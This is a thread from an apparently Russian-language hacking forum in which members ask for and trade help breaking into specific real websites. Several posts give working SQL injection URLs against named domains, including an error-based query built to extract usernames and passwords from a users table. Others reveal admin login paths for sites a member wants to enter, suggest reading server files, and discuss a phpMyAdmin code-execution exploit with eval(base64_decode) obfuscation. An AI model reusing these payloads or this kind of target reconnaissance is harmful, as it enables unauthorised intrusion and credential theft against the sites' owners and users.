Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    133
    Likes Received:
    9
    Reputations:
    1
    Скажу прямо...как узнать по имени домена где находится панель управления хостингом.
    Может у вас есть варианты...всё перерыл ничего не нашел. кудато попал...но там ни данных подключения ничего нет...прсото написано, что у вас есть хостинг и всё )
     
  2. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    whois -> dns.
    ну там далее пробьёшь хостера, у хостера спросишь адрес панели.
     
    #13682 Ctacok, 18 Jun 2010
    Last edited: 18 Jun 2010
    1 person likes this.
  3. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    133
    Likes Received:
    9
    Reputations:
    1
    Ага, спасибо так и сделал, хостер сказал что у вас домен резолвится на VPS ;) а впс не наш. вобщем я нашел этот впс, нашел ссылки до phpmyadmin и ispmanagera....есть много инофрмации о хозяине. но не знаю что дальше делать....тупик.
    Хотел восстановить на мыло пасы от ISP так оказывается нет такой функции...
     
  4. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    про /scripts/setup.php
    я так и не понял, что ты имел в виду.
    если ты про код, который берется с ftp, то никаких там проблем с кавычками нет, сейчас протестил:
    PHP:
    <?php 
    echo "<br>".get_magic_quotes_gpc()."<br>";
    echo 
    "'x'<br>";
    echo 
    $_SERVER['PHP_SELF'];
    exit;
    ?>
    =>
    1
    'x'
    /pma/scripts/setup.php

    кстати, если бы "проблемы" с кавычками были бы, то их легко можно было бы решить при помощи, например, eval(base64_decode(blalba))) ]


    кста,
    вариант с кодом на ftp не работает при allow_url_fopen = Off
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    но насколько помню по дефолту ulr_fopen=On
     
    _________________________
  6. manerus

    manerus New Member

    Joined:
    10 Aug 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    помогите найти столбцы, брут не помог
    Version: 4.0.26-nt

    Code:
    http://www.brew-monkey.com/brewschool/hop.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
     
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,594
    Likes Received:
    1,242
    Reputations:
    273
    и что ты ожидаешь? что у кого то есть паранормальный брут который прям угадает столбцы?сам делай словарь и бруть по нему...

    попробуй прочитать файлы на сервере, c:/boot.ini
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    попробуй в эту сторону глянуть, у них там этот форум:

    http://forum.snitz.com/

    бесплатный, скачай и посмотри таблицы/колонки
     
    1 person likes this.
  9. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    а можно рабочий пример где это потестить можно ?
    или хотя бы версию pma и mysql
    бо у себя пробовал на localhost, phpMyAdmin-2.10.2, 5.1.40-community - не фига не выходит :(


    ps:
    здесь: http://forum.antichat.ru/threadnav46016-340-10.html
    и здесь: http://forum.antichat.ru/threadnav50669-1-40-phpMyAdmin.html все прочел
     
  10. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    453
    Likes Received:
    54
    Reputations:
    4
    http://www.tullamorechamber.com/

    хелп, где тут алминка?
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    http://tullamorechamber.com/Adm/MyLogin.php?Page=/Adm/
     
    1 person likes this.
  12. FlaktW

    FlaktW Member

    Joined:
    19 Aug 2009
    Messages:
    483
    Likes Received:
    33
    Reputations:
    12
    Не могу попасть в админку.

    http://alvand.basu.ac.ir/~flora/family.php?id=29+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x3a,Id,
    user_name,
    password)+from+users+limit+0,1),1,64),floor(rand(0)*2)))z)+--+

    Id,
    user_name,
    password

    http://alvand.basu.ac.ir/login.php

    aa:ss
    a:a
     
  13. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    185
    Likes Received:
    12
    Reputations:
    0
    есть доступ к админке каторая правит странички.



    добавляю <? echo("ololol"); ?>

    Но выводит почему-то как html :(:


    <td>
    <?php echo("dd");
    ?>
    2
    </td>

    почему такая шляпа?
     
    #13693 InfectedM, 19 Jun 2010
    Last edited: 19 Jun 2010
  14. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    Потому что страничка небойсь в mysql идёт?
    Из mysql, знаешь ли не интерпретируется код..
    Вы вообще читать умеете, я про ту багу, которую я описал пару страничек назад?
     
  15. k2b1~

    k2b1~ Banned

    Joined:
    17 Jun 2010
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    помояите наыти админку
    поjaлуста

    http://www.ycap.am/
    i
    http://piccolino.am/
     
  16. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    /controlpanel/
    У обоих, но это хостинг, пробуй мб войдёшь.
     
  17. k2b1~

    k2b1~ Banned

    Joined:
    17 Jun 2010
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    da eto cPanel//
    a mne admin panel
     
  18. GIG

    GIG New Member

    Joined:
    17 Apr 2010
    Messages:
    57
    Likes Received:
    4
    Reputations:
    5
    Кравлером проходил ? Если да , то вариантов поиска я более не вижу.
     
  19. BlackFan

    BlackFan Member

    Joined:
    3 Jan 2009
    Messages:
    47
    Likes Received:
    40
    Reputations:
    32
    http://www.ycap.am/admin/adminlogin.php
    http://piccolino.am/cms/login.php
     
  20. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    канэчна рядовой [на кэпа, чисто по званию, сие изречения как-то не тянет :) ]

    17.06.2010, 18:01 Ctacok
    17.06.2010, 19:21 Ctacok
    Цитата:
    где там ?
    речь шла о http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/ где используется уязвимость unserialize() а не где создается новый config/config.inc.php. если ты тут админ, то не значит что ты кого-то умнее, это значит что тебе непозволительно тупить, что ты как раз похоже и сделал. если я не прав, объясни на "пальцах" чего я не "сумел прочитать", только конкретно, понятно и с цитатами/ссылками, а не голословными заявлениями и объяснениями не понятно о каких дырах.
     
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.